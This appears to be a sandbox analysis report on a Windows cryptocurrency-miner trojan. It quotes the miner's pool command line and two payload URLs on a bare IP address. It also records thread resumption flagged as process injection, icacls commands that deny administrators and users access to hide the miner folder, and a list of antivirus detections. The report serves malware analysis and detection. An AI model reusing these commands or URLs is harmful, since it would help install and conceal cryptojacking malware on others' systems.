cmdline	"C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (2 events)

url	http://194.147.115.117/zzztop/PhoenixMiner.exe
url	http://194.147.115.117/zzztop/This.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 resumed a thread in remote process 3028
Process injection	Process 2092 resumed a thread in remote process 1536
NtResumeThread March 9, 2021, 12:41 p.m.	thread_handle: 0x00000424 suspend_count: 1 process_identifier: 3028	1	0	0
NtResumeThread March 9, 2021, 12:41 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 1536	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline	icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
cmdline	icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline	C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"

File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Trojan.GenericKD.35338298
FireEye	Generic.mg.c49dd8107b3624f8
McAfee	Artemis!C49DD8107B36
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Trojan:Win32/Miner.b6b763bb
K7GW	Riskware ( 0040eff71 )
K7AntiVirus	Riskware ( 0040eff71 )
Arcabit	Trojan.Generic.D21B383A
Cyren	W32/Trojan.YYEL-5697
Symantec	Trojan.Gen.MBT
TrendMicro-HouseCall	TROJ_GEN.R057C0PKC20
Avast	Win32:Malware-gen
Kaspersky	Trojan.Win32.Miner.asymo
BitDefender	Trojan.GenericKD.35338298
NANO-Antivirus	Trojan.Win32.Miner.ibscgf
Paloalto	generic.ml
AegisLab	Hacktool.Win32.Gamehack.3!e
Tencent	Win32.Trojan.Miner.Syhx
Ad-Aware	Trojan.GenericKD.35338298
Sophos	Mal/Generic-S
Comodo	Malware@#6chz4oapf33y
F-Secure	Heuristic.HEUR/AGEN.1100129
DrWeb	Trojan.Siggen10.62280
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R057C0PKC20
McAfee-GW-Edition	BehavesLike.Win32.TrojanAitInject.dh
Emsisoft	Trojan.CoinMiner (A)
APEX	Malicious
MaxSecure	Trojan.Malware.300983.susgen
Avira	HEUR/AGEN.1100129
MAX	malware (ai score=100)
Gridinsoft	Trojan.Win32.CoinMiner.vb
Microsoft	Trojan:Win32/CoinMiner.AC!rfn
ZoneAlarm	Trojan.Win32.Miner.asymo
GData	Trojan.GenericKD.35338298
Cynet	Malicious (score: 85)
AhnLab-V3	Malware/Win32.Generic.C4224711
VBA32	Trojan.Miner
ALYac	Trojan.GenericKD.35338298
Malwarebytes	Generic.Malware/Suspicious
Ikarus	Trojan.Win32.CoinMiner
ESET-NOD32	a variant of Win32/CoinMiner.CFE
eGambit	Unsafe.AI_Score_94%
Fortinet	AutoIt/Agent.OUJ!tr.dldr
Webroot	W32.Trojan.Gen
AVG	Win32:Malware-gen
Cybereason	malicious.07b362

this.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All